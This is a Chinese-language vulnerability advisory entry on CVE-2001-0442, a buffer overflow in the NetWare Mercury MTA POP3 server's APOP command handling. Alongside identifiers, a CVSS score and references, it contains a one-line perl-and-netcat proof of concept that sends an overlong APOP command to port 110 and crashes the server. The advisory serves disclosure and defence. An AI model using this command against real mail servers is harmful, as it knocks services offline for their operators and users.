NetWare Mercury MTA POP3服务器缓冲区溢出漏洞

NetWare Mercury MTA POP3服务器缓冲区溢出漏洞

漏洞ID 1106313 漏洞类型 缓冲区溢出
发布时间 2001-04-21 更新时间 2005-05-02
图片[1]-NetWare Mercury MTA POP3服务器缓冲区溢出漏洞-安全小百科CVE编号 CVE-2001-0442
图片[2]-NetWare Mercury MTA POP3服务器缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200106-198
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20792
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-198
|漏洞详情
NetWare1.48及其早期版本的MercuryMTAPOP3服务器存在缓冲区溢出漏洞。远程攻击者记住超长APOP命令导致服务拒绝和可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/2641/info

Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command.

Because the overflow occurs in an authentication command parser, unauthenticated remote users can trigger the overflow. It is unknown whether the overflow can lead to arbitrary code execution, but proof-of-concept code is available that will crash the NetWare server, requiring a reboot. 

perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "rn"' | nc mercury_host 110
|参考资料

来源:BID
名称:2641
链接:http://www.securityfocus.com/bid/2641
来源:BUGTRAQ
名称:20010421MercuryforNetWarePOP3servervulnerabletoremotebufferoverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0378.html
来源:XF
名称:mercury-mta-bo(6444)
链接:http://www.iss.net/security_center/static/6444.php
来源:BUGTRAQ
名称:20010424Re:MercuryforNetWarePOP3servervulnerabletoremotebufferoverflow
链接:http://online.securityfocus.com/archive/1/179217

相关推荐: Planetmoon Guestbook Clear Text Password Retrieval Vulnerability

Planetmoon Guestbook Clear Text Password Retrieval Vulnerability 漏洞ID 1100622 漏洞类型 Design Error 发布时间 2003-03-21 更新时间 2003-03-21 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享